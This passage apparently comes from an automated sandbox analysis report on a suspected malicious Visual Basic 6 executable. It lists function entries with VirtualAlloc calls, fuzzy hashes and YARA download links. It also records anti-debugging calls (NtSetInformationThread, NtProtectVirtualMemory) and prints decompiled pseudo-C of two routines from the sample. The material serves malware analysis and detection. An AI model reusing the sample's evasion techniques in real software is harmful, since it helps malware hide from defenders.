                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: ef8bbc329ff087313c6acc93ff6a4307bdfce6dda69b95c87c4a3bd36ebde093
                          • Instruction ID: fa720aa2c45872c0e8ac4a643f182e0874bd86a928e2f07c39cefdea41610ecf
                          • Opcode Fuzzy Hash: ef8bbc329ff087313c6acc93ff6a4307bdfce6dda69b95c87c4a3bd36ebde093
                          • Instruction Fuzzy Hash: 94417CD5A6E703C6F49361B000819315450EED735A2B38BBB5723B14C2A33E969F368F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049AD, Relevance: 1.4, APIs: 1, Instructions: 120memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: cc4189405a68f2ca42e24a75c9aa225f92926348643a07aee0d9fcb29f850240
                          • Instruction ID: 4a36eff456b27500e39820cbb5779d069c7f68533dda1a75d80257eab34a7811
                          • Opcode Fuzzy Hash: cc4189405a68f2ca42e24a75c9aa225f92926348643a07aee0d9fcb29f850240
                          • Instruction Fuzzy Hash: 54315CD5A6E703C6F49361B000819316054EED735A1B38BBB5B33718C2A33E969B368F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040499E, Relevance: 1.4, APIs: 1, Instructions: 119memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 1973d76d3efa3f8eca72dcfaef39532c7a17038b1df941b23cdab33670e47cd3
                          • Instruction ID: cd53a916cfd969340c337c4d93335e1edca58527055cb3e17a9d5c03dfc6c8f8
                          • Opcode Fuzzy Hash: 1973d76d3efa3f8eca72dcfaef39532c7a17038b1df941b23cdab33670e47cd3
                          • Instruction Fuzzy Hash: C7315CD5A6E703C6F49361B000819316450EED735A1B38BBB5733718C2A33E969B368F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404B3C, Relevance: 1.4, APIs: 1, Instructions: 116memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 4798b86714e054c56dfc82f0e412d9744def13e72ea29349eb028df01bb77273
                          • Instruction ID: 148ad29ca32e350a587ddf9068280969bb7c76ed40e0a056cc278e6c94aa240b
                          • Opcode Fuzzy Hash: 4798b86714e054c56dfc82f0e412d9744def13e72ea29349eb028df01bb77273
                          • Instruction Fuzzy Hash: 2F2139D0A2E607C5F89321A040809315455FEE73551738BBB9B23718C2A63D969B32DF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004049BD, Relevance: 1.4, APIs: 1, Instructions: 112memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: bc143c691bf093c7ebccba199c306ab7be8e89df1fab39c28874c1b79052ebed
                          • Instruction ID: 92b45e25df0ebb70a50ea91e592046a2c7d4a3052279f8bb186e836a2dc8b490
                          • Opcode Fuzzy Hash: bc143c691bf093c7ebccba199c306ab7be8e89df1fab39c28874c1b79052ebed
                          • Instruction Fuzzy Hash: CB317ED4A6E703C5F49361B000819316050EED73592B38BBB5733718C2A33E968B368F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A6B, Relevance: 1.4, APIs: 1, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                          • Instruction ID: cb147bb6cc61b047197b813434174cf4c128319adbd0723c65c6827364c0eefe
                          • Opcode Fuzzy Hash: 91e33f138806f9fd374a4bb8c39bfb5f557424d2b4533238fbf98676654aaf3e
                          • Instruction Fuzzy Hash: D0214DD4A6E707C5F49361B000819315054EEE73561738BBB9B33718C2A63E969B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A37, Relevance: 1.4, APIs: 1, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                          • Instruction ID: c69b1403859733c7cc5d3123be69c0480bce6eeba375f5de3bc5c2b5d97b2e45
                          • Opcode Fuzzy Hash: 8ac95c6530fe62219c128747c47118d6cfd9bf169f98c4555ed48adecb6f32bc
                          • Instruction Fuzzy Hash: 79315CD5A7E707C5F49361B000819316154EEE73561738BBF9B23714C2A23E969B728F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404AEB, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                          • Instruction ID: a6396661349038fbd6d1bb1c1d76b35d292715510b71c8b5717f67cde438a1f9
                          • Opcode Fuzzy Hash: de3e7cae9c32a2a88d116303178c36f14280665aa5bba7b1ab99c770d22ba0e7
                          • Instruction Fuzzy Hash: 18217AD0D2E607C6F95321B000808315455EED73656738BBB9B23728C2A63E969F72CE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404AB2, Relevance: 1.4, APIs: 1, Instructions: 105memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                          • Instruction ID: c0937b0cff1bb249555b3b0f0c52f623b9a37c7067222e8afb09757a00bd89fb
                          • Opcode Fuzzy Hash: 7aff71f9cdc042bed321d719ce63f0e087760c651781f9c84954bb8c31645a56
                          • Instruction Fuzzy Hash: 8C214BD4A2E607C5F89361B001819315064EEE73551738FBB9B33718C2A63E969B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404AC7, Relevance: 1.4, APIs: 1, Instructions: 103memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                          • Instruction ID: fab38d300d8a960dfe8087095ffeedff7716247deecef09fa22ccfa5180acee5
                          • Opcode Fuzzy Hash: 254644590c7491985fb893dc137853faca34093ee44513ee4cfb35dde58dfd4a
                          • Instruction Fuzzy Hash: AA218CD4A2E607C5F89321B000809316060EED73556738FBB5B23718C2A63EA29B32CF
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404A56, Relevance: 1.4, APIs: 1, Instructions: 100memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                          • Instruction ID: fd4390dcd7bb85f2687ae67deb092a570c23becf98975b9f227acdf89342d9c4
                          • Opcode Fuzzy Hash: 573d26fde16b3af0309e6634f1e13181e4c12f304e61d72f2c2f9f217da8d2f6
                          • Instruction Fuzzy Hash: FA31ADE0A6E607C5F99361B0418193160A0EEE73152738BBF9723714C2A73E965B768F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 021D5531, Relevance: .2, Instructions: 195librarynativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,021D0570,00000000,00000000,00000000,00000000), ref: 021D05F8
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                            • Part of subcall function 021D5A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021D5609,00000040,021D0570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021D5A87
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                          • String ID:
                          • API String ID: 449006233-0
                          • Opcode ID: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                          • Instruction ID: 5b3a61809898503fca3e35e3c6f72e0da70bf03543b48d1ccec2dc3c2ef721c3
                          • Opcode Fuzzy Hash: 5ae958c3113e0e0aaa7fdbf0c35f4427f06d8ea34d9cb66c872f0b43214b5ccc
                          • Instruction Fuzzy Hash: 6C610861984342DEDB318F6885D4BA17B939F17330FD9C2A9CDA64F2D6D3758441C722
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D1E09, Relevance: .1, Instructions: 135COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                          • Instruction ID: 257612eeba9cd1af32ff1aa798f9ebef7aed7ab6fa60b2500ddad2d007db32d7
                          • Opcode Fuzzy Hash: 3c15a7b9a87c8160f53269abfe4c8eca20e4b920815d3e0cd1eb82c3f2ebfaae
                          • Instruction Fuzzy Hash: 5A41E9306C4301EFFB25AE24C894BE973A6FF19354F914116EDAA8B1D1D7B5D8C4CA12
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D1C16, Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                          • Instruction ID: 7e8a2925817025084ee96120e797dd2f1fbaa03c3c5c4cea9696ca233cf9d733
                          • Opcode Fuzzy Hash: 2059a55964caa1500504178f7ec4321333b4a43cba00d56926b5d3365da83390
                          • Instruction Fuzzy Hash: CF31F271BC0615EFCB689A28CC54BD663E9BF05320F554326ECADD3281D720E889CB80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D4CBB, Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                          • Instruction ID: 1d629c8bae5ec679ff045355b3c9801070278dd7398d1f4f4ebef9fa2add0d67
                          • Opcode Fuzzy Hash: 17c2ee888b86588c30084440f874a25fc694d3b71ddbbb06637507cf0a777cf1
                          • Instruction Fuzzy Hash: EAF08C74345202CFC715EA24C6D4F9473A0EF693B0F5688A1EC85C3662D335EC40C520
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D29C8, Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                          • Instruction ID: c774c3d1e9a88e27358d1c86903a8312c879459471df9d3be9315755b80da27e
                          • Opcode Fuzzy Hash: 50f1797a04462ddc6dea509b6ccbca2ec1beaf0b8fdc9b72d0d0851085ebf76c
                          • Instruction Fuzzy Hash: 68C092B36405808FEF02CE08C886B8073B1FB25E84B4904D4E803CF612E328ED01CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D4802, Relevance: .0, Instructions: 5COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                          • Instruction ID: 53564383bf43054fcb6bc85e7037885d87c04f7f94de5ee9bb9c5ed8a313171f
                          • Opcode Fuzzy Hash: bd978d2a180bd48f33f02ed769998f637591f3217dd52bc83d8caa31607e2653
                          • Instruction Fuzzy Hash: 08B09234221A408FCA41CE08C180E4073A0BB08660B010680E8208BBA1C324E804CA00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040C053, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135COMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E0040C053(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v32;
				intOrPtr _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				long long _v128;
				signed int _v132;
				signed int* _v136;
				signed int _v140;
				signed int _v144;
				signed char _t61;
				void* _t67;
				void* _t69;
				intOrPtr _t70;
				long long _t73;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L00401120();
				_v16 = _t70;
				_v12 = 0x4010f8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401126, _t67);
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				_push( &_v64);
				_t61 =  &_v48;
				_push(_t61);
				_v56 =  *0x4010f0;
				_t73 =  *0x4010e8;
				_v64 = _t73;
				asm("fld1");
				_v72 = _t73;
				L004011C8();
				L004011CE();
				_v128 = _t73;
				asm("fchs");
				asm("fnstsw ax");
				if((_t61 & 0x0000000d) == 0) {
					L004011CE();
					asm("fcomp qword [ebp-0x7c]");
					asm("fnstsw ax");
					asm("sahf");
					if(__eflags == 0) {
						_t17 =  &_v132;
						 *_t17 = _v132 & 0x00000000;
						__eflags =  *_t17;
					} else {
						_v132 = 1;
					}
					_v132 =  ~_v132;
					_v100 = __ax;
					__eax =  &_v64;
					_push( &_v64);
					__eax =  &_v48;
					_push( &_v48);
					_push(2);
					L004011C2();
					__esp = __esp + 0xc;
					__eax = _v100;
					__eflags = __eax;
					if(__eax != 0) {
						__eflags =  *0x40d594;
						if( *0x40d594 != 0) {
							_v136 = 0x40d594;
						} else {
							_push(0x40d594);
							_push(0x4024a8);
							L004011BC();
							_v136 = 0x40d594;
						}
						_v136 =  *_v136;
						_v100 =  *_v136;
						__eax =  &_v32;
						_v100 =  *_v100;
						__eax =  *((intOrPtr*)( *_v100 + 0x1c))(_v100,  &_v32);
						asm("fclex");
						_v104 = __eax;
						__eflags = _v104;
						if(_v104 >= 0) {
							_t37 =  &_v140;
							 *_t37 = _v140 & 0x00000000;
							__eflags =  *_t37;
						} else {
							_push(0x1c);
							_push(0x402498);
							_push(_v100);
							_push(_v104);
							L004011F2();
							_v140 = __eax;
						}
						__eax = _v32;
						_v108 = _v32;
						_v72 = 0x80020004;
						_v80 = 0xa;
						__eax = 0x10;
						L00401120();
						__esi =  &_v80;
						__edi = __esp;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v108 =  *_v108;
						__eax =  *((intOrPtr*)( *_v108 + 0x60))(_v108, L"bdmphgm4oKLHkMpKtKuJ5249");
						asm("fclex");
						_v112 = __eax;
						__eflags = _v112;
						if(_v112 >= 0) {
							_t52 =  &_v144;
							 *_t52 = _v144 & 0x00000000;
							__eflags =  *_t52;
						} else {
							_push(0x60);
							_push(0x4024b8);
							_push(_v108);
							_push(_v112);
							L004011F2();
							_v144 = __eax;
						}
						__ecx =  &_v32;
						L004011B6();
					}
					asm("wait");
					_push(E0040C235);
					return __eax;
				}
				return __imp____vbaFPException();
			}



























                          0x0040c056
                          0x0040c065
                          0x0040c06f
                          0x0040c077
                          0x0040c07a
                          0x0040c081
                          0x0040c090
                          0x0040c093
                          0x0040c09a
                          0x0040c0a1
                          0x0040c0a8
                          0x0040c0b2
                          0x0040c0b3
                          0x0040c0b6
                          0x0040c0bf
                          0x0040c0c2
                          0x0040c0ca
                          0x0040c0cd
                          0x0040c0d1
                          0x0040c0d4
                          0x0040c0d9
                          0x0040c0de
                          0x0040c0e7
                          0x0040c0e9
                          0x0040c0ed
                          0x0040c0f3
                          0x0040c0f8
                          0x0040c0fb
                          0x0040c0fd
                          0x0040c0fe
                          0x0040c109
                          0x0040c109
                          0x0040c109
                          0x0040c100
                          0x0040c100
                          0x0040c100
                          0x0040c110
                          0x0040c112
                          0x0040c116
                          0x0040c119
                          0x0040c11a
                          0x0040c11d
                          0x0040c11e
                          0x0040c120
                          0x0040c125
                          0x0040c128
                          0x0040c12c
                          0x0040c12e
                          0x0040c134
                          0x0040c13b
                          0x0040c158
                          0x0040c13d
                          0x0040c13d
                          0x0040c142
                          0x0040c147
                          0x0040c14c
                          0x0040c14c
                          0x0040c168
                          0x0040c16a
                          0x0040c16d
                          0x0040c174
                          0x0040c179
                          0x0040c17c
                          0x0040c17e
                          0x0040c181
                          0x0040c185
                          0x0040c1a1
                          0x0040c1a1
                          0x0040c1a1
                          0x0040c187
                          0x0040c187
                          0x0040c189
                          0x0040c18e
                          0x0040c191
                          0x0040c194
                          0x0040c199
                          0x0040c199
                          0x0040c1a8
                          0x0040c1ab
                          0x0040c1ae
                          0x0040c1b5
                          0x0040c1be
                          0x0040c1bf
                          0x0040c1c4
                          0x0040c1c7
                          0x0040c1c9
                          0x0040c1ca
                          0x0040c1cb
                          0x0040c1cc
                          0x0040c1d5
                          0x0040c1da
                          0x0040c1dd
                          0x0040c1df
                          0x0040c1e2
                          0x0040c1e6
                          0x0040c202
                          0x0040c202
                          0x0040c202
                          0x0040c1e8
                          0x0040c1e8
                          0x0040c1ea
                          0x0040c1ef
                          0x0040c1f2
                          0x0040c1f5
                          0x0040c1fa
                          0x0040c1fa
                          0x0040c209
                          0x0040c20c
                          0x0040c20c
                          0x0040c211
                          0x0040c212
                          0x00000000
                          0x0040c212
                          0x0040112c

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C06F
                          • #678.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D4
                          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0D9
                          • __vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040C0F3
                          • __vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A), ref: 0040C120
                          • __vbaNew2.MSVBVM60(004024A8,0040D594,?,?,00401126), ref: 0040C147
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C194
                          • __vbaChkstk.MSVBVM60(00000000,?,00402498,0000001C), ref: 0040C1BF
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C1F5
                          • __vbaFreeObj.MSVBVM60(00000000,?,004024B8,00000060), ref: 0040C20C
                          Strings
                          • bdmphgm4oKLHkMpKtKuJ5249, xrefs: 0040C1CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __vba$CheckChkstkFreeHresult$#678ListNew2
                          • String ID: bdmphgm4oKLHkMpKtKuJ5249
                          • API String ID: 1840260717-316254104
                          • Opcode ID: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                          • Instruction ID: 0f554fd696726ee348e140752fea5efc4d458bc0cc6133c1b91ab8ab7a6ed652
                          • Opcode Fuzzy Hash: 0a76fd71c2dd6c036da4bca4f363627f585d09351277c41896fa5862236fa63e
                          • Instruction Fuzzy Hash: D8515670D40308EFDB04EF95C889B9DBBB9FB08704F10816AE548BB2A1CBB94844DF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040BD44, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                          Download Yara Rule
                          C-Code - Quality: 63%
                          			E0040BD44(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v3;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v32;
				void* _v48;
				struct HWND__* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v397355967;
				signed int _t34;
				short _t36;
				void* _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t49;

				_t38 = __ecx;
				asm("in al, dx");
				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401120();
				_v16 = _t49;
				_v12 = E004010B0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126, _t45);
				_t34 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v68);
				asm("fclex");
				_v72 = _t34;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4020d4);
					_push(_a4);
					_push(_v72);
					L004011F2();
					_v84 = _t34;
				}
				HideCaret(_v68);
				L004011EC();
				_push(0);
				_t36 =  *0x004039FF();
				asm("aam 0xa");
				 *_t36 =  *_t36 + _t36;
				_v397355967 = _v397355967 + _t38;
				_v32 = _t36;
				L004011E0();
				_push(E0040BE01);
				return _t36;
			}



















                          0x0040bd44
                          0x0040bd46
                          0x0040bd47
                          0x0040bd56
                          0x0040bd60
                          0x0040bd68
                          0x0040bd6b
                          0x0040bd72
                          0x0040bd81
                          0x0040bd90
                          0x0040bd93
                          0x0040bd95
                          0x0040bd9c
                          0x0040bdb5
                          0x0040bd9e
                          0x0040bd9e
                          0x0040bda0
                          0x0040bda5
                          0x0040bda8
                          0x0040bdab
                          0x0040bdb0
                          0x0040bdb0
                          0x0040bdbc
                          0x0040bdc1
                          0x0040bdcb
                          0x0040bdd3
                          0x0040bdd6
                          0x0040bdd8
                          0x0040bdda
                          0x0040bde4
                          0x0040bdeb
                          0x0040bdf0
                          0x00000000

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                          • HideCaret.USER32(?), ref: 0040BDBC
                          • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                          • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                          • String ID:
                          • API String ID: 2961917346-0
                          • Opcode ID: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                          • Instruction ID: 4b25c979fca95e85091d665f10c397e12c70c7e34684666f5dd652a0ccf7a8f1
